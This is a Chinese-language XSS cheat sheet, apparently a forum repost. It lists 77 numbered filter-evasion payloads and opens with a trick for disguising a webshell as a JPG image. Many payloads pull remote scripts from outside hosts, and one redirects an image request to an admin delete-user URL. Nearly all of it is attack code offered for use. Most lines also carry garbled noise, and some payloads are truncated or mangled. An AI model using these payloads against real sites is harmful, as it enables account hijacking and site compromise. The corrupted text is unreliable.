跨站图片shell2 k. k6 U- T# L, D- }$ e. c ^
XSS跨站代码 <script>alert("")</script>& x# F5 e4 x* V0 E: v, W
$ _8 A7 Y5 S1 W/ z; J, }, n5 L! W
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马; h) |, M4 |- [ _* T3 {1 u+ P3 p
# `3 R8 ~( t2 r6 M) `6 @; P
) r! H0 U3 W, a/ X6 T5 O+ P Z, _" r1 k/ _0 R2 ^, U3 [& v
1)普通的XSS JavaScript注入2 b: F# h; }3 _( k F% ]
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! I8 M% y* Y2 _8 [2 ?. p
$ o+ q9 J5 C+ Q. O% l
(2)IMG标签XSS使用JavaScript命令
" [. ~- d0 F; @5 s# i! i<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 O' x' |/ T" U. |# C
, I; O1 o& v# G' p7 S1 m- r, P9 k
(3)IMG标签无分号无引号: Z- ^6 B3 q4 y" m8 S
<IMG SRC=javascript:alert(‘XSS’)>
: C) O" n# a1 V* D/ J% E$ w5 V9 k" e% \9 K9 X" f
(4)IMG标签大小写不敏感$ i8 o j3 a1 s5 N5 D2 W
<IMG SRC=JaVaScRiPt:alert(‘XSS’)> p7 E7 Q) | n0 @7 }; |1 G
4 v# B" b5 I7 R) u: p7 ?
(5)HTML编码(必须有分号)
$ g! x" V0 u" I, J<IMG SRC=javascript:alert(“XSS”)> A2 R4 [* K& K
1 h, e0 O" ?0 C* v0 _
(6)修正缺陷IMG标签9 p9 h% `9 ]' I; A
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; `3 T" K' {* t8 e1 x# ?/ h
3 v7 H3 n* u1 C/ c P. e
(7)formCharCode标签(计算器)* J8 w Z9 u9 E9 b
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>4 t, f( r& n; S
" k P6 y3 c! G @3 H3 |/ R2 ~
(8)UTF-8的Unicode编码(计算器)
# \2 `9 X! S; |+ M% r<IMG SRC=jav..省略..S')>
$ s" t! A: Y. u% x4 O# T' W
$ \ J C/ ~; K- G9 h(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 K' r3 Q$ v9 H! s& g) G<IMG SRC=jav..省略..S')>
; Q1 c& ~; u5 ~, [) D0 C$ P+ M# F% P @! |/ ]& `
(10)十六进制编码也是没有分号(计算器)3 R* C% N8 b8 X; E9 r1 h
<IMG SRC=java..省略..XSS')>' x+ A2 U7 E8 z" Y! K* U
' I) v+ T$ C3 a+ Q5 m% Z/ C2 j6 m
(11)嵌入式标签,将Javascript分开0 R( p" v, O* ~" t' f
<IMG SRC=”jav ascript:alert(‘XSS’);”>( u) k. ?: u/ I+ c
& b) P. Z5 S3 r$ T0 u, S, ^
(12)嵌入式编码标签,将Javascript分开8 o4 i4 Q; t( R6 u
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ b% T/ {* Y% Q2 j7 u, e! s
- F3 f7 ^" t" z# H v+ m/ j" a, |9 p(13)嵌入式换行符
% Z" Z2 A4 o( N5 W' E5 S+ s) o& v<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 b W( g4 a5 o0 d: |. q. N) z
1 m6 T+ B2 Y w+ C& L# T* i(14)嵌入式回车% o" r( s; J& v0 h
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 i `. g( O x8 r$ q1 K( d/ S+ \
3 Y/ ~4 E& D1 u$ h(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ g& {* _4 u6 ]2 f% `0 Q' L9 ]9 L
<IMG SRC=”javascript:alert(‘XSS‘)”>
* y. O1 x9 C/ U/ R! P- H' X" d( g) ?
(16)解决限制字符(要求同页面)
) x1 U$ d; @* r$ j- m! a7 f<script>z=’document.’</script>
% y1 s! T) B7 w. ?<script>z=z+’write(“‘</script>
0 _# N5 |3 D, y, N<script>z=z+’<script’</script>( X( A! k7 Q# z
<script>z=z+’ src=ht’</script>
- R0 w- s$ u( x' p' o1 X# Z<script>z=z+’tp://ww’</script>
0 U+ b4 [0 U9 v# E: l<script>z=z+’w.shell’</script>" ]; N, \/ q1 n
<script>z=z+’.net/1.’</script>7 {6 W; J' I+ M
<script>z=z+’js></sc’</script>" l Z p/ ~, ?7 c p5 s
<script>z=z+’ript>”)’</script> B% T4 y! j( p. }) c+ N
<script>eval_r(z)</script>! ]# F y/ {4 R o7 E8 G# J7 p& a! _2 E
* d: V' o. a( {; e
(17)空字符
* z: e2 e( |" Nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) S% Z* q. e) ]$ t" i1 C/ p( o
; @' e$ A. M6 B j% c
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 o1 U- @0 M- D; ~3 |. r# C9 ^perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
* i3 D/ U6 n" i5 }* C( Z3 U- O/ h) k/ F/ D7 N
(19)Spaces和meta前的IMG标签1 f% R2 J! k, O9 C+ l
<IMG SRC=” javascript:alert(‘XSS’);”>
3 c( W2 _7 h* T! Y/ B) j% f
0 p; c% n' ^6 C. V$ i4 Q(20)Non-alpha-non-digit XSS
1 N+ K9 k1 G n0 ?0 k& H- f1 G" A, D: I<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 ~( m: K0 d. u( V0 H% ] s9 Q
! r, E3 n6 f, W0 O9 H(21)Non-alpha-non-digit XSS to 2: S0 _8 L9 X; v
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) ?5 Q& N0 Y, w) d9 A- o6 ]5 [$ w1 s; X. I, i* w1 P( ~0 }
(22)Non-alpha-non-digit XSS to 3' d v- Z$ H: ~# }' A
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 F3 V- B4 i/ U i5 y1 D3 E
x, ?+ J7 i2 L" ~& N4 Z- A$ D S/ a(23)双开括号3 J6 K' Q+ _, @) ^2 s" J" h2 t @
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
7 T0 r0 B5 l, m* |" F
2 E3 m5 W8 L/ v' n(24)无结束脚本标记(仅火狐等浏览器)2 g9 J) r5 R) b& Q1 W: z, a
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- {. @; ^( ^$ h4 @ l, k! c( H: A- O% a, C, Q% D( v/ p9 ?, w( n
(25)无结束脚本标记2
; Y' A0 [" y& \ o<SCRIPT SRC=//3w.org/XSS/xss.js>
4 K% b6 m3 `2 ]- d5 x8 k* }
# p) w& M7 ]9 \* }2 j(26)半开的HTML/JavaScript XSS
$ m6 n9 D# ~( |! Y<IMG SRC=”javascript:alert(‘XSS’)”
# |9 `4 X6 Q9 s7 \6 F+ W. X" k* |* H7 q: m
(27)双开角括号
6 L- i1 P* [# z# N+ K<iframe src=http://3w.org/XSS.html <9 |1 Q, p" t! k
- m4 i/ w/ [% N# m+ w# s(28)无单引号 双引号 分号+ w# C# b- j& u4 l p" f, Q6 ^: s) S! k
<SCRIPT>a=/XSS/
9 m4 P0 m8 j- n6 @0 P& b5 ?alert(a.source)</SCRIPT>
" A( O6 ]/ j1 U) D* V
$ Z7 s! g# ?* \& W8 | _# V6 E. i* t. v(29)换码过滤的JavaScript- {& x6 Z) Z: Q* j c+ x) r) W$ Q
\”;alert(‘XSS’);//2 a" j4 x p7 f
3 F$ u& v% i% p- I; [: ^
(30)结束Title标签+ ]+ @& n) l2 m+ E3 u* H. |. q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
$ k( y/ E4 r! |. F
7 Z) ]- V( M, x$ d' ?: ~, n- q, ?(31)Input Image2 h: ]# e2 P# m# R0 m" F) Q! X& _
<INPUT SRC=”javascript:alert(‘XSS’);”>8 V' P# u6 q3 u3 C! W) g% y
3 T2 Z! D! r6 C6 x
(32)BODY Image( q x8 ]2 t- n" e( k; w0 s: j2 y5 p
<BODY BACKGROUND=”javascript:alert(‘XSS’)”># m9 T1 m( A9 `8 j* O: y0 H" h
$ e1 H$ K. t9 ~4 P5 [' J
(33)BODY标签% p4 Z4 ~5 m- Q b( Q; v$ \2 |' r
<BODY(‘XSS’)>" y* w* Q" P1 m9 @
% s' q, D) [/ A# s7 W5 ?7 Y(34)IMG Dynsrc- ]# M4 N1 Q% C* O. {9 s
<IMG DYNSRC=”javascript:alert(‘XSS’)”>' h3 o5 }$ |; ?& f9 I+ ^" ]
( _9 ~* l! e L8 i5 P(35)IMG Lowsrc
9 u! J' c t; s+ J, U<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ A4 d3 j+ J$ y( }& ~
. {7 e- Q0 w4 U2 {# y. N' t( s) z(36)BGSOUND
; V7 p% p3 W! V& M* V<BGSOUND SRC=”javascript:alert(‘XSS’);”>% H! n8 l2 U3 r3 J
+ ~& D4 M; o# A5 S' r* A0 J(37)STYLE sheet
3 w* Q0 Z2 |6 s% K$ t<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
# p6 u0 Z7 Y1 B6 q9 \" S0 o
: v9 l; H2 j/ m( u6 a+ T# r% p(38)远程样式表' n3 d8 c0 I& ~7 d) k
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) D3 F$ z/ G% r e X( w
/ E6 R7 U4 P( J7 ?9 L
(39)List-style-image(列表式)7 U+ E5 ]; _( X( m c" q* f: e
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS* i( `4 x9 o: ]1 L9 F# y
" e: V4 I3 j/ W- U; |* f
(40)IMG VBscript
6 G$ G- D' F6 e<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- j' Z& m* G$ M+ I! o- u6 ?1 P! j4 O) o$ x4 i h( Y
(41)META链接url( S3 ]( e# f2 P6 s1 \- b; o0 J( e+ O
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
- \- V: [$ w" j5 W+ h
) H8 x% b- M6 A" [(42)Iframe8 c" h; m9 K- e: o' V
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 k! z$ x+ q/ j9 _' H# ~(43)Frame
& i) j' C8 ]2 _+ D& C, @; j<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
8 I' v7 H+ |. r# s5 x; \5 l9 W# \" z$ j/ l
(44)Table
/ P* T+ ?; x/ Q3 E<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 x7 b, m% N1 V$ Z! _8 `! p4 [+ }2 o3 _! x$ ^$ |( h& l
(45)TD
0 y9 x& O K x8 M/ ?4 k1 j- g<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
6 Z6 L; }4 d0 w( q
. ]. f/ o& s# x: y0 Q$ w(46)DIV background-image
1 `: r2 g3 g! ^& @8 d<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& b) o1 C S) V- A; J- O/ c
- Y; ^. l0 V! J) v \& R(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)& r( J7 b; h! ^
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>8 w' H& H, E+ [; l
) e$ y9 C0 I( Q( k* h3 Y8 h1 Q. N
(48)DIV expression
# r. D* c7 n# E& |: o. T; Y<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" q9 \5 e0 A+ n, v" `8 I3 D; F1 u; h9 T3 h% l: z" C
(49)STYLE属性分拆表达
{7 c' s8 Y0 i/ M; D* |+ u<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
9 z8 y* G! v( w+ |) A9 n1 e# K/ S8 B# x
. s. h( E7 ^% l& G1 b( m(50)匿名STYLE(组成:开角号和一个字母开头); T/ S/ ]$ F! q" N) d# x; M
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 @: n" n3 p: [2 W; k) o4 [
5 s3 S4 [+ t& ]. Z" L% ]
(51)STYLE background-image
3 L4 j4 F' P# N/ W/ [+ x<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- q F' o( t$ y' V5 i8 f5 k' a: ~
: I, @! r! L5 P- A- c(52)IMG STYLE方式
1 P1 [5 s2 h4 N4 q Aexppression(alert(“XSS”))’>
7 O, [% l! E" E$ R& [$ P6 K4 j) @2 @, ^+ I# H& k9 W
(53)STYLE background
& I" P7 V( Q" s, s% R/ Q<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>* E4 c$ r- K7 q6 `7 _$ K1 b |
7 Q$ j' L$ C+ p, [) Y* _
(54)BASE3 D3 I( j+ p% m6 W
<BASE HREF=”javascript:alert(‘XSS’);//”>
1 C1 x$ ^# S! p* D+ ?3 s6 Z+ D: b6 u" W
, }) i2 X: p, Y4 a2 y8 T8 k(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, V: P, Q/ R* D# N; ~! v8 B<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
" f G. {. j% Z! ?
7 [( k. c0 B; Z/ `2 c" |(56)在flash中使用ActionScrpt可以混进你XSS的代码
; o' [$ t* t' [! o2 u! v7 Fa=”get”;0 x; ^# Y1 i4 Q2 v4 E" O! ~
b=”URL(\”";8 L) V8 W: T- A% J. B
c=”javascript:”;
$ k4 z3 X& {0 M' f' e7 @d=”alert(‘XSS’);\”)”;2 k" z8 ~4 a) A
eval_r(a+b+c+d);
# A% T& E, D& `' x* p }- S( O" M0 Y4 x$ o- W8 k' s5 ~. U
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 }# Y% @) r/ x) e1 {) G
<HTML xmlns:xss>
- q( g: i' p* h! m- M% r( W6 ^<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: c/ e6 Z, m9 d- z, s0 Y; F<xss:xss>XSS</xss:xss>5 R, R* o, Y; X# d, e7 p! H4 C1 {
</HTML>
5 f+ h1 e8 ^0 z) e
. D6 w/ \8 M$ ?/ B(58)如果过滤了你的JS你可以在图片里添加JS代码来利用! W `/ b% t% F$ X2 W% B
<SCRIPT SRC=””></SCRIPT>" z) F( b. g0 d9 P' F) n( K
* i4 A4 y$ O! E/ _(59)IMG嵌入式命令,可执行任意命令
+ u! X, G* j4 C1 u3 {<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 l; y9 Z1 j" E) M5 K8 z$ M' v! s/ S3 [
(60)IMG嵌入式命令(a.jpg在同服务器)) V" J$ |) w# `- l% b6 m
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* v" ?4 i6 i$ F/ K. O8 x6 k# g- w& e8 i5 c
(61)绕符号过滤, s7 y5 p4 |2 w& ~2 r7 V* H U
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# G) w5 y. g1 b9 d
) I5 Z, L3 b% Y* N) [0 X$ q; v(62)6 w* S# p1 h# C$ e
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- f4 w0 H. Y1 p) f3 {7 X5 ^: c
$ W% C/ D' R8 N [8 w. ~(63)9 S4 ]' h6 Q% j( z* o3 C: q
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- a/ Y- U- y( d( C6 {5 u* u
) t9 a- b2 ~* L7 }; U0 t+ G8 w(64)9 q0 [) S# n- o+ d x+ U
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
$ @+ G( f0 Y+ _% l Y0 Z- e
1 N _1 k% r% B/ X% t1 ?1 h(65)5 U4 p _. L, v( H, }
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>+ B# M7 \) o+ S" f1 k) |
" v0 P8 K: [: d( X+ V: _1 c* m(66)
4 d% z$ z7 ^ D$ b. k. Y. k! Y<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>- T) S- s5 Q8 A
! Y7 y+ O) d5 j h/ l, J' p7 c3 ^, _# o(67)( }. s0 K6 X. k! V5 e Q, l0 `
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>3 P8 x) g7 i7 I: X; t
% \2 J; C8 R9 `% Y- s0 C; U
(68)URL绕行9 o: ^- y! O8 d: O
<A HREF=”http://127.0.0.1/”>XSS</A>. X% Y" ^& ~$ C! b( Z+ N5 R
/ l" L) m: K- N6 s(69)URL编码$ X. g0 E0 {& a1 v) s$ J% A P
<A HREF=”http://3w.org”>XSS</A>( {3 J9 _1 t1 F# h) q) ~1 a: o- O
2 z/ [1 q+ y) F. f* c
(70)IP十进制6 K; n% C, v' E% k
<A HREF=”http://3232235521″>XSS</A>& ]7 w0 }# [3 z7 \
' b( q8 X; ^- g. I8 B
(71)IP十六进制
9 w. a3 z4 Z2 Q0 s<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>3 I! N3 [0 ]9 W) T% L# Q0 O' j
9 @5 x- h3 z& }% k(72)IP八进制9 d+ w' K4 i) B
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
: c0 Y. X* B b0 w) V' K
6 T5 s1 |. R2 A) s3 v(73)混合编码; u9 r; F5 `$ r# R2 T& ?& h
<A HREF=”h
; z0 c; ]$ ?# \/ J7 p" N: u1 Y8 H5 Wtt p://6 6.000146.0×7.147/”">XSS</A> f! M: x Q) e& e) I
; F% K2 Q. [7 V! Y- b; v6 R(74)节省[http:]5 g6 ^8 Z/ Q( C
<A HREF=”//www.google.com/”>XSS</A>6 S; _! S5 s. U# t {; u+ N8 F
+ I# ^7 n B9 u! s, b(75)节省[www]) J. V7 W1 i9 a) T4 P7 Z# b
<A HREF=”http://google.com/”>XSS</A>
/ ~: d- J# q. F) \; h4 q7 }# g4 L6 y- p, J
(76)绝对点绝对DNS
0 z, W$ R4 p5 \) ^) ?' W<A HREF=”http://www.google.com./”>XSS</A># Y' d( q9 |4 O& F4 h- ~
@9 [9 T ?" P) o(77)javascript链接
6 C9 Q1 `9 N; G: b<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>( ]2 [0 v5 K- L' z
|